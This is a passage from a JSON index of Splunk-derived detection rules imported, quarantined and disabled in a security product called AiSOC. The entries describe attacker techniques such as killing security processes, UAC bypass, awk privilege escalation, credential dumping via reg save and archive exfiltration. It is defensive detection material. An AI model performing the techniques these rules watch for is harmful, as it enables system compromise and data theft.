command-line executions. This activity is significant because threat actors often use 'pkill' to disable security defenses or terminate critical processes, facilitating further malicious actions. If confirmed malicious, this behavior could lead to the disruption of security applications, enabling attackers to evade detection and potentially corrupt or destroy files on the targeted system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-impair-defenses-process-kill.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "435c6b33-adf9-47fe-be87-8e29fd6654f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_impair_defenses_process_kill.yml" } }, { "id": "splunk-security-content-43834687-cc48-4878-a2fa-f76e4271791f", "type": "detection", "name": "Windows Compatibility Telemetry Tampering Through Registry", "description": "This detection identifies suspicious modifications to the Windows Compatibility Telemetry registry settings, specifically within the \"TelemetryController\" registry key and \"Command\" registry value. It leverages data from the Endpoint.Registry data model, focusing on registry paths and values indicative of such changes. This activity is significant because CompatTelRunner.exe and the \"Microsoft Compatibility Appraiser\" task always run as System and can be used to elevate privileges or establish a highly privileged persistence mechanism. If confirmed malicious, this could enable unauthorized code execution, privilege escalation, or persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-compatibility-telemetry-tampering-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "43834687-cc48-4878-a2fa-f76e4271791f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_compatibility_telemetry_tampering_through_registry.yml" } }, { "id": "splunk-security-content-43bc9281-753b-4743-b4b7-60af84f085f3", "type": "detection", "name": "Linux Auditd Stop Services", "description": "The following analytic detects attempts to stop a service on Linux systems. It leverages data from Linux Auditd. This activity is significant as adversaries often stop or terminate security or critical services to disable defenses or disrupt operations, as seen in malware like Industroyer2. If confirmed malicious, this could lead to the disabling of security mechanisms, allowing attackers to persist, escalate privileges, or deploy destructive payloads, severely impacting system integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-stop-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "43bc9281-753b-4743-b4b7-60af84f085f3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_stop_services.yml" } }, { "id": "splunk-security-content-446e81ff-ce06-4925-9c7d-4073f9b5abf5", "type": "detection", "name": "Cisco Duo Bypass Code Generation", "description": "The following analytic detects when a Duo user generates a bypass code, which allows them to circumvent multi-factor authentication (2FA) protections.\nIt works by monitoring Duo activity logs for the 'bypass_create' action, renaming the affected object as the user, and aggregating events to identify\ninstances where a bypass code is issued. This behavior is significant for a Security Operations Center (SOC) because generating a bypass code can enable\nattackers, malicious insiders, or unauthorized administrators to gain access to sensitive systems without the required second authentication factor.\nSuch activity may indicate account compromise, privilege abuse, or attempts to weaken security controls. Early detection of bypass code generation is\ncritical, as it allows the SOC to investigate and respond before an attacker can exploit the reduced authentication requirements, helping to prevent\nunauthorized access, data breaches, or further lateral movement within the environment. Monitoring for this action helps maintain strong authentication\nstandards and reduces the risk of credential-based attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-bypass-code-generation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "446e81ff-ce06-4925-9c7d-4073f9b5abf5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_bypass_code_generation.yml" } }, { "id": "splunk-security-content-4477f3ea-a28f-11eb-b762-acde48001122", "type": "detection", "name": "Multiple Archive Files Http Post Traffic", "description": "The following analytic detects the high-frequency exfiltration of archive files via HTTP POST requests. It leverages HTTP stream logs to identify specific archive file headers within the request body. This activity is significant as it often indicates data exfiltration by APTs or trojan spyware after data collection. If confirmed malicious, this behavior could lead to the unauthorized transfer of sensitive data to an attacker\u2019s command and control server, potentially resulting in severe data breaches and loss of confidential information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/multiple-archive-files-http-post-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4477f3ea-a28f-11eb-b762-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/multiple_archive_files_http_post_traffic.yml" } }, { "id": "splunk-security-content-4479539c-71fc-11ec-b2e2-acde48001122", "type": "detection", "name": "Linux Possible Access To Sudoers File", "description": "The following analytic detects potential access or modification of the /etc/sudoers file on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"cat,\" \"nano,\" \"vim,\" and \"vi\" accessing the /etc/sudoers file. This activity is significant because the sudoers file controls user permissions for executing commands with elevated privileges. If confirmed malicious, an attacker could gain persistence or escalate privileges, compromising the security of the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-access-to-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4479539c-71fc-11ec-b2e2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_access_to_sudoers_file.yml" } }, { "id": "splunk-security-content-449f525a-7b42-47be-96a7-d9724e336c19", "type": "detection", "name": "O365 Email New Inbox Rule Created", "description": "The following analytic identifies the creation of new email inbox rules in an Office 365 environment. It detects events logged under New-InboxRule and Set-InboxRule operations within the o365_management_activity data source, focusing on parameters that may indicate mail forwarding, removal, or obfuscation. Inbox rule creation is a typical end-user activity however attackers also leverage this technique for multiple reasons.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003", "T1564.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-new-inbox-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "449f525a-7b42-47be-96a7-d9724e336c19", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_new_inbox_rule_created.yml" } }, { "id": "splunk-security-content-44badcb1-2e8c-4628-9537-021bbae571ad", "type": "detection", "name": "Windows Cisco Secure Endpoint Stop Immunet Service Via Sfc", "description": "The following analytic detects the use of the `sfc.exe` utility, in order to stop the Immunet Protect service. The Sfc.exe utility is part of Cisco Secure Endpoint installation. This detection leverages telemetry from the endpoint, focusing on command-line executions involving the `-k` parameter. This activity is significant as it indicates potential tampering with defensive mechanisms. If confirmed malicious, attackers could partially blind the EDR, enabling further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-stop-immunet-service-via-sfc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "44badcb1-2e8c-4628-9537-021bbae571ad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_stop_immunet_service_via_sfc.yml" } }, { "id": "splunk-security-content-44fddcb2-8d3b-454c-874e-7c6de5a4f7ac", "type": "detection", "name": "Detect Rare Executables", "description": "The following analytic detects the execution of rare processes that appear only once across the network within a specified timeframe.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs.\nThis activity is significant for a SOC as it helps identify potentially malicious activities or unauthorized software, which could indicate a security breach or ongoing attack.\nIf confirmed malicious, such rare processes could lead to data theft, privilege escalation, or complete system compromise, making early detection crucial for minimizing impact.\nThe search currently identifies processes executed on fewer than 10 hosts, but this threshold can be adjusted based on the organization's environment and risk tolerance.\nThe search groups results by process name which can lead to blind spots if a malicious process uses a common name. To mitigate this, consider enhancing the detection logic to group by additional attributes such as process hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rare-executables.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "44fddcb2-8d3b-454c-874e-7c6de5a4f7ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rare_executables.yml" } }, { "id": "splunk-security-content-4510cae0-96a2-4840-9919-91d262db210a", "type": "detection", "name": "Linux AWK Privilege Escalation", "description": "The following analytic detects the use of the AWK command with elevated privileges to execute system commands. It leverages Endpoint Detection and Response (EDR) telemetry, specifically monitoring processes that include \"sudo,\" \"awk,\" and \"BEGIN*system\" in their command lines. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain root access by executing commands as the root user. If confirmed malicious, this could allow an attacker to fully compromise the system, execute arbitrary commands, and maintain persistent control over the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-awk-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4510cae0-96a2-4840-9919-91d262db210a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_awk_privilege_escalation.yml" } }, { "id": "splunk-security-content-453a6b0f-b0ea-48fa-9cf4-20537ffdd22c", "type": "detection", "name": "Windows UAC Bypass Suspicious Child Process", "description": "The following analytic detects when an executable known for User Account Control (UAC) bypass exploitation spawns a child process in a user-controlled location or a command shell executable (e.g., cmd.exe, powershell.exe). This detection leverages Sysmon EventID 1 data, focusing on high or system integrity level processes with specific parent-child process relationships. This activity is significant as it may indicate an attacker has successfully used a UAC bypass exploit to escalate privileges. If confirmed malicious, this could allow the attacker to execute arbitrary commands with elevated privileges, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-uac-bypass-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "453a6b0f-b0ea-48fa-9cf4-20537ffdd22c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_uac_bypass_suspicious_child_process.yml" } }, { "id": "splunk-security-content-454076fb-0e9e-4adf-b93a-da132621c5e6", "type": "detection", "name": "Kubernetes Process Running From New Path", "description": "The following analytic identifies processes running from newly seen paths within a Kubernetes environment. It leverages process metrics collected via an OTEL collector and hostmetrics receiver, and data is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on. This detection compares processes observed in the last hour with those seen over the previous 30 days. This activity is significant as it may indicate unauthorized changes, compromised nodes, or the introduction of malicious software. If confirmed malicious, it could lead to unauthorized process execution, control over critical resources, data exfiltration, privilege escalation, or malware introduction within the Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-process-running-from-new-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "454076fb-0e9e-4adf-b93a-da132621c5e6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_process_running_from_new_path.yml" } }, { "id": "splunk-security-content-455da527-0047-4610-a3ca-b4a005c2d346", "type": "detection", "name": "Windows Remote Host Computer Management Access", "description": "The following analytic detects the use of mmc.exe to launch Computer Management (compmgmt.msc) and connect to a remote machine. This technique allows administrators to access system management tools, including Event Viewer, Services, Shared Folders, and Local Users & Groups, without initiating a full remote desktop session. While commonly used for legitimate administrative purposes, adversaries may leverage this method for remote reconnaissance, privilege escalation, or persistence. Monitoring the execution of mmc.exe with the /computer:{hostname/ip} argument can help detect unauthorized system administration attempts or lateral movement within a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-host-computer-management-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "455da527-0047-4610-a3ca-b4a005c2d346", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_host_computer_management_access.yml" } }, { "id": "splunk-security-content-459628e3-1b00-4e9b-9e5b-7da8961aea35", "type": "detection", "name": "Windows Shell Process from CrushFTP", "description": "The following analytic identifies instances where CrushFTP's service process (crushftpservice.exe) spawns shell processes like cmd.exe or powershell.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. This activity is significant because CrushFTP should not normally spawn interactive shell processes during regular operations. If confirmed malicious, this behavior could indicate successful exploitation of vulnerabilities like CVE-2025-31161, potentially allowing attackers to execute arbitrary commands with the privileges of the CrushFTP service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003", "T1190", "T1505" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-shell-process-from-crushftp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "459628e3-1b00-4e9b-9e5b-7da8961aea35", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_shell_process_from_crushftp.yml" } }, { "id": "splunk-security-content-45b125c4-866f-11eb-a95a-acde48001122", "type": "detection", "name": "Windows High File Deletion Frequency", "description": "The following analytic identifies a high frequency of file deletions by monitoring Sysmon EventCodes 23 and 26 for specific file extensions. This detection leverages Sysmon logs to track deleted target filenames, process names, and process IDs. Such activity is significant as it often indicates ransomware behavior, where files are encrypted and the originals are deleted. If confirmed malicious, this activity could lead to extensive data loss and operational disruption, as ransomware can render critical files inaccessible, demanding a ransom for their recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-high-file-deletion-frequency.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "45b125c4-866f-11eb-a95a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_high_file_deletion_frequency.yml" } }, { "id": "splunk-security-content-45cd08f8-a2c9-4f4e-baab-e1a0c624b0ab", "type": "detection", "name": "Disabling Windows Local Security Authority Defences via Registry", "description": "The following analytic identifies the deletion of registry keys that disable Local Security Authority (LSA) protection and Microsoft Defender Device Guard. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry actions and paths associated with LSA and Device Guard settings. This activity is significant because disabling these defenses can leave a system vulnerable to various attacks, including credential theft and unauthorized code execution. If confirmed malicious, this action could allow attackers to bypass critical security mechanisms, leading to potential system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-windows-local-security-authority-defences-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "45cd08f8-a2c9-4f4e-baab-e1a0c624b0ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml" } }, { "id": "splunk-security-content-45ebd21c-f4bf-4ced-bd49-d25b6526cebb", "type": "detection", "name": "Windows Query Registry Browser List Application", "description": "The following analytic detects a suspicious process accessing the registry entries for default internet browsers. It leverages Windows Security Event logs, specifically event code 4663, to identify access attempts to these registry paths. This activity is significant because adversaries can exploit this registry key to gather information about installed browsers and their settings, potentially leading to the theft of sensitive data such as login credentials and browsing history. If confirmed malicious, this behavior could enable attackers to exfiltrate sensitive information and compromise user accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-query-registry-browser-list-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "45ebd21c-f4bf-4ced-bd49-d25b6526cebb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_query_registry_browser_list_application.yml" } }, { "id": "splunk-security-content-4662c6b1-0754-455e-b9ff-3ee730af3ba8", "type": "detection", "name": "Windows Modify Registry With MD5 Reg Key Name", "description": "The following analytic detects potentially malicious registry modifications characterized by MD5-like registry key names. It leverages the Endpoint data model to identify registry entries under the SOFTWARE path with 32-character hexadecimal names, a technique often used by NjRAT malware for fileless storage of keylogs and .DLL plugins. This activity is significant as it can indicate the presence of NjRAT or similar malware, which can lead to unauthorized data access and persistent threats within the environment. If confirmed malicious, attackers could maintain persistence and exfiltrate sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-with-md5-reg-key-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4662c6b1-0754-455e-b9ff-3ee730af3ba8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml" } }, { "id": "splunk-security-content-466379bc-0f47-476c-8202-16ef38112e0d", "type": "detection", "name": "Windows Registry Entries Exported Via Reg", "description": "The following analytic detects the execution of the reg.exe process with either the \"save\" or \"export\" parameters. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because threat actors often use the \"reg save\" or \"reg export\" command to dump credentials or test registry modification capabilities on compromised hosts. If confirmed malicious, this behavior could allow attackers to escalate privileges, persist in the environment, or access sensitive information stored in the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-entries-exported-via-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "466379bc-0f47-476c-8202-16ef38112e0d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_entries_exported_via_reg.yml" } }, { "id": "splunk-security-content-4669561d-3bbd-44e3-857c-0e3c6ef2120c", "type": "detection", "name": "Linux Auditd Data Transfer Size Limits Via Split", "description": "The following analytic detects suspicious data transfer activities that involve the use of the `split` syscall, potentially indicating an attempt to evade detection by breaking large files into smaller parts. Attackers may use this technique to bypass size-based security controls, facilitating the covert exfiltration of sensitive data. By monitoring for unusual or unauthorized use of the `split` syscall, this analytic helps identify potential data exfiltration attempts, allowing security teams to intervene and prevent the unauthorized transfer of critical information from the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-data-transfer-size-limits-via-split.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4669561d-3bbd-44e3-857c-0e3c6ef2120c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_data_transfer_size_limits_via_split.yml" } }, { "id": "splunk-security-content-467ed9d9-8035-470e-ad5e-ae5189283033", "type": "detection", "name": "Windows Impair Defense Add Xml Applocker Rules", "description": "The following analytic detects the use of a PowerShell commandlet to import an AppLocker XML policy. This behavior is identified by monitoring processes that execute the \"Import-Module Applocker\" and \"Set-AppLockerPolicy\" commands with the \"-XMLPolicy\" parameter. This activity is significant because it can indicate an attempt to disable or bypass security controls, as seen in the Azorult malware. If confirmed malicious, this could allow an attacker to disable antivirus products, leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-add-xml-applocker-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "467ed9d9-8035-470e-ad5e-ae5189283033", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml" } }, { "id": "splunk-security-content-468b7e11-d362-43b8-b6ec-7a2d3b246678", "type": "detection", "name": "Detect RTLO In File Name", "description": "The following analytic identifies the use of the right-to-left override\n(RTLO) character in file names. It leverages data from the Endpoint.Filesystem datamodel,\nspecifically focusing on file creation events and file names containing the RTLO\ncharacter (U+202E). This activity is significant because adversaries use RTLO to\ndisguise malicious files as benign by reversing the text that follows the character.\nIf confirmed malicious, this technique can deceive users and security tools, leading\nto the execution of harmful files and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rtlo-in-file-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "468b7e11-d362-43b8-b6ec-7a2d3b246678", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rtlo_in_file_name.yml" } }, { "id": "splunk-security-content-46ba0082-61af-11ec-9826-acde48001122", "type": "detection", "name": "Linux File Creation In Profile Directory", "description": "The following analytic detects the creation of files in the /etc/profile.d directory on Linux systems. It leverages filesystem data to identify new files in this directory, which is often used by adversaries for persistence by executing scripts upon system boot. This activity is significant as it may indicate an attempt to maintain long-term access to the compromised host. If confirmed malicious, this could allow attackers to execute arbitrary code with elevated privileges each time the system boots, potentially leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-file-creation-in-profile-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "46ba0082-61af-11ec-9826-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_file_creation_in_profile_directory.yml" } }, { "id": "splunk-security-content-46d676aa-40c6-4fe6-b917-d23b621f0f89", "type": "detection", "name": "Windows Credentials from Password Stores Deletion", "description": "The following analytic detects the execution of the Windows OS tool cmdkey.exe with the /delete parameter. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. The activity is significant because cmdkey.exe can be used by attackers to delete stored credentials, potentially leading to privilege escalation and persistence. If confirmed malicious, this behavior could allow attackers to remove stored user credentials, hindering incident response efforts and enabling further unauthorized access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "46d676aa-40c6-4fe6-b917-d23b621f0f89", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_deletion.yml" } }, { "id": "splunk-security-content-46f946ed-1c78-4e96-9906-c7a4be15e39b", "type": "detection", "name": "Internal Vulnerability Scan", "description": "This analytic detects internal hosts 